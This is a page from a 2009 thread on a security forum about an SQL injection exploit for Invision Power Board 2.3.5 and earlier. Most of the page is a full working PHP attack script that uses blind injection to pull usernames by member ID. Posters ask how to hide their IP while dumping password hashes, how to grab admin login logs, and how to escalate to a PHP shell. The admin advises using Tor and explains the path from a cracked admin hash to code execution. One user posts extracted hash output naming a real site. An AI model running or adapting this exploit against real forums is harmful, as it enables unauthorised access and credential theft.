Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: July 27, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 214 Members: 0 Total: 214 Full disclosure CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus [KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability [KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability CVE-2024-33326 CVE-2024-33327 CVE-2024-33328 CVE-2024-33329 CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100 SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products Novel DoS Vulnerability Affecting WebRTC Media Servers APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8 40 vulnerabilities in Toshiba Multi-Function Printers 17 vulnerabilities in Sharp Multi-Function Printers SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise) IT Security and Insecurity Portal www.waraxe.us Forum Index -> Invision Power Board -> IPB <= 2.3.5 sql injection exploit (new version 1.2) Goto page Previous1, 2, 3, 4, 5, 6Next View previous topic :: View next topic Posted: Thu Jan 22, 2009 5:34 pm OpenMASK Regular user Joined: Jan 22, 2009 Posts: 6 waraxe wrote: It's probably vulnerable, because 2 test are passing, but for some reason sql error occurs in later phase. Why - i have no idea. You must debug the script (use echo, print or similar in right places) and try to find out server response. If needed, then there can be more ways to fetch data from the same sql injection. Just be creative Thank u very much man!! ))) Posted: Thu Feb 26, 2009 3:45 am AciddTripp Beginner Joined: Feb 26, 2009 Posts: 1 Thanks for the exploit, works great. One question, what is the risk of my ip address being shown in any logs if I extract a large amount of hashes with this exploit? Or should I be running with an anonymous proxy to protect myself? Posted: Thu Feb 26, 2009 2:16 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu AciddTripp wrote: Thanks for the exploit, works great. One question, what is the risk of my ip address being shown in any logs if I extract a large amount of hashes with this exploit? Or should I be running with an anonymous proxy to protect myself? It's wise to hide your IP of course. From exploit source: Code: # Proxy settings # Be sure to use proxy :) //$proxy_ip_port = '127.0.0.1:8118'; //$proxy_user_password = 'someuser:somepassword'; Just uncomment needed lines and use proxy. My suggestion is Tor: http://vidalia-project.net Tor is slow, but bulletproof for most operations Posted: Fri May 01, 2009 12:26 pm VERTIGO Advanced user Joined: Sep 25, 2008 Posts: 87 Hmm waraxe one question/ i test one forum its ipb www.site.com\index.php?act=xmlout&do=check-display-name&name=%2527 and has isp eror,does will exploit works on these forum because in url does not have forums Posted: Sun May 03, 2009 5:47 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu VERTIGO wrote: Hmm waraxe one question/ i test one forum its ipb www.site.com\index.php?act=xmlout&do=check-display-name&name=%2527 and has isp eror,does will exploit works on these forum because in url does not have forums As far as specifix AJAX function is accessible and sql injection really exists, this exploit should work. Posted: Mon May 04, 2009 12:06 am ba9ba9 Active user Joined: Feb 11, 2009 Posts: 46 waraxe wrote: VERTIGO wrote: Hmm waraxe one question/ i test one forum its ipb www.site.com\index.php?act=xmlout&do=check-display-name&name=%2527 and has isp eror,does will exploit works on these forum because in url does not have forums As far as specifix AJAX function is accessible and sql injection really exists, this exploit should work. its is any methode to get the prefix of a forum beacause ibf_ dont work Posted: Mon Aug 17, 2009 5:17 pm nuker Active user Joined: Aug 16, 2009 Posts: 39 hi, can this exploit be modified so you can get the admin login logs? that would be useful as it shows the number of characters and last character of the password so its a little easier to figure it out. thank you. Modification Posted: Sun Aug 23, 2009 3:55 pm RG007145 Active user Joined: May 04, 2008 Posts: 27 A quick modification (made in a big hurry) to fetch the login username given people's ID: Note: It says finding hash but it's finding the username. And [a-f] means [A-z] since I'm so lazy. Note 2: A "0" in the username means a space. One or multiple "0"s after the username means it's done. Code: <?php error_reporting(E_ALL); /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// // IPB <= 2.3.5 sql injection exploit // Version 1.2 // written by Janek Vind "waraxe" // Estonia, Tartu // http://www.waraxe.us/ // 24. september 2008 // based on DarkFig's advisory // http://acid-root.new.fr/?0:18 // // FEATURES: // 1. Fetching algorithm optimized for speed // 2. Attack goes through $_POST, so no suspicious logs // 3. Pretesting saves time if IPB is not vulnerable // 4. curl extension autoloading // 5. can work with multiple ID-s // 6. log format compatible with passwordspro // // More useful tools: http://www.waraxe.us/tools/ // Waraxe forums: http://www.waraxe.us/forums.html // // NB! This exploit is meant to be run as php CLI! // http://www.php.net/features.commandline /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// //===================================================================== $url = 'http://localhost/ipb/'; $id_start = 1;// starting user ID, default value "1" is admin's ID $id_end = 10;// ending user ID $prefix = 'ibf_';// IPB table prefix, default is "ibf_" # Proxy settings # Be sure to use proxy :) //$proxy_ip_port = '127.0.0.1:8118'; //$proxy_user_password = 'someuser:somepassword'; $outfile = './ipblog.txt';// Log file //====================================================================== /////////////////////////////////////////////////////////////////////// // Don't mess below this line, unless you know the stuff ;) /////////////////////////////////////////////////////////////////////// //===================================================================== /////////////////////////////////////////////////////////////////////// if(!extension_loaded('curl')) { if(!dl('php_curl.dll')) { die("Curl extension not loaded!\n Fatal exit ...\n"); } else { echo "Curl loading success\n"; } } //===================================================================== $cli = php_sapi_name() === 'cli'; //===================================================================== // Warning, if executed from webserver //===================================================================== if(!$cli) { if(!isset($_REQUEST['wtf-is-cli'])) { echo "<html><head><title>Attention!</title></head>\n"; echo "<body><br /><br /><center>\n"; echo "<h1>Warning!</h1>\n"; echo "This exploit is meant to be used as php CLI script!<br />\n"; echo "More information:<br />\n"; echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n"; echo "Still, you can try to run it from webserver.<br />\n"; echo "Just press the button below and prepare for long waiting<br />\n"; echo "And learn to use php CLI next time, please ...<br />\n"; echo "<form method=\"get\">\n"; echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n"; echo "</form>\n"; echo "</center></body></html>\n"; exit; } else { // Let's try to maximize our chances without CLI @set_time_limit(0); } } //===================================================================== xecho("Target: $url\n"); xecho("Sql table prefix: $prefix\n"); xecho("Testing target URL ... \n"); test_target_url(); xecho("Target URL seems to be valid\n"); add_line("Target: $url"); for($i = $id_start; $i <= $id_end; $i ++) { echo "Testing ID $i\n"; if(!test_target_id($i)) { echo "ID $i not valid, passing ...\n"; continue; } echo "ID $i validated\n"; $hash = get_hash($i); $salt = ''; $line = "$i:$hash:$salt"; add_line($line); xecho("\n------------------------------------------\n"); xecho("User ID: $i\n"); xecho("Hash: $hash\n"); xecho("Salt: $salt"); xecho("\n------------------------------------------\n"); } add_line("------------------------------------------"); xecho("\nQuestions and feedback - http://www.waraxe.us/ \n"); die("See ya! :) \n"); ////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////// function test_target_url() { global $url; $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- '; $buff = trim(make_post($url, $post, '', $url)); if($buff === 'notfound') { die('Target is patched? Exiting ...'); } if($buff !== 'found') { die('Invalid response, target URL not valid? Exiting ...'); } } ////////////////////////////////////////////////////////////////////// function test_target_id($id) { global $url, $prefix; $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32'; return test_condition($post); } /////////////////////////////////////////////////////////////////////// function get_hash($id) { $len = 32; $out = ''; xecho("Finding hash ...\n"); for($i = 1; $i < $len + 1; $i ++) { $ch = get_hashchar($i, $id); xecho("Got pos $i --> $ch\n"); $out .= "$ch"; xecho("Current hash: $out \n"); } xecho("\nFinal hash for ID $id: $out\n\n"); return $out; } /////////////////////////////////////////////////////////////////////// function get_hashchar($pos, $id) { global $prefix; $char = ''; $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members WHERE id=$id AND ORD(SUBSTR(name,$pos,1))"; // First let's determine, if it's number or letter $post = $pattern . '%253e57'; $letter = test_condition($post); if($letter) { $min = 65; $max = 122; xecho("Char to find is [a-f]\n"); } else { $min = 48; $max = 57; xecho("Char to find is [0-9]\n"); } $curr = 0; while(1) { $area = $max - $min; if($area < 2 ) { $post = $pattern . "=$max"; $eq = test_condition($post); if($eq) { $char = chr($max); } else { $char = chr($min); } break; } $half = intval(floor($area / 2)); $curr = $min + $half; $post = $pattern . '%253e' . $curr; $bigger = test_condition($post); if($bigger) { $min = $curr; } else { $max = $curr; } xecho("Current test: $curr-$max-$min\n"); } return $char; } /////////////////////////////////////////////////////////////////////// function test_condition($p) { global $url; $bret = false; $maxtry = 10; $try = 1; $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- '; $post = sprintf($pattern, $p); while(1) { $buff = trim(make_post($url, $post, '', $url)); if($buff === 'found') { $bret = true; break; } elseif($buff === 'notfound') { break; } elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false) { die("Sql error! Wrong prefix?\nExiting ... "); } else { xecho("test_condition() - try $try - invalid return value ...\n"); $try ++; if($try > $maxtry) { die("Too many tries - exiting ...\n"); } else { xecho("Trying again - try $try ...\n"); } } } return $bret; } /////////////////////////////////////////////////////////////////////// function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE) { $ch = curl_init(); $timeout = 120; curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)'); if(!empty($GLOBALS['proxy_ip_port'])) { curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']); if(!empty($GLOBALS['proxy_user_password'])) { curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']); } } if(!empty($cookie)) { curl_setopt ($ch, CURLOPT_COOKIE, $cookie); } if(!empty($referer)) { curl_setopt ($ch, CURLOPT_REFERER, $referer); } if($headers === TRUE) { curl_setopt ($ch, CURLOPT_HEADER, TRUE); } else { curl_setopt ($ch, CURLOPT_HEADER, FALSE); } $fc = curl_exec($ch); curl_close($ch); return $fc; } /////////////////////////////////////////////////////////////////////// function add_line($line) { global $outfile; $line .= "\n"; $fh = fopen($outfile, 'ab'); fwrite($fh, $line); fclose($fh); } /////////////////////////////////////////////////////////////////////// function xecho($line) { if($GLOBALS['cli']) { echo "$line"; } else { $line = nl2br(htmlspecialchars($line)); echo "$line"; } } ////////////////////////////////////////////////////////////////////// ?> Posted: Mon Aug 24, 2009 3:21 am nuker Active user Joined: Aug 16, 2009 Posts: 39 Nice, can you modify it so you can get the admin login logs with it? Posted: Thu Oct 22, 2009 7:35 am Meithal Beginner Joined: Oct 22, 2009 Posts: 3 tere! Is there any mean to use this exploit for UPDATE a table? It's a question of LIFE or DEATH. Thank you! Posted: Thu Oct 22, 2009 9:59 am waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Meithal wrote: tere! Is there any mean to use this exploit for UPDATE a table? It's a question of LIFE or DEATH. Thank you! Tere In case of php/mysql combination there is no stacked (multiple) sql queries allowed. So you need sql injection vulnerability in UPDATE query in order to manipulate specific table in writable manner. My IPB exploit is based on sql injection in SELECT query, so it is not able to UPDATE directly. But if you can fetch admin hash(-es) and they are crackable, then IPB admin level and finally PHP code level are possible (php shell). Which means, that you can modify sql database from php. Posted: Thu Oct 22, 2009 10:40 am Meithal Beginner Joined: Oct 22, 2009 Posts: 3 ok thanks, of course the sql shell don't allow to update the tables you need, but there is still the template bits where there is many php code, let's go here not work Posted: Wed Nov 04, 2009 12:21 pm Doky Beginner Joined: Nov 04, 2009 Posts: 1 Hy,not working... Script generate hash & salt.. not work:( ------------------------------------------ User ID: 142348 (Root admin) Hash: 00d2594a7a719d383ad178778951461b Salt: UVe3' ------------------------------------------ www.netmozi.com not work,not login.. :S test pls thx Posted: Sat Nov 07, 2009 11:33 pm RG007145 Active user Joined: May 04, 2008 Posts: 27 You're not allowed to post websites... Posted: Thu Dec 10, 2009 1:09 am AgentJ9 Active user Joined: Sep 07, 2008 Posts: 26 does it still work? & what version of PHP will i need? IPB <= 2.3.5 sql injection exploit (new version 1.2) www.waraxe.us Forum Index -> Invision Power Board You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 4 of 6 Goto page Previous1, 2, 3, 4, 5, 6Next All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.311 Seconds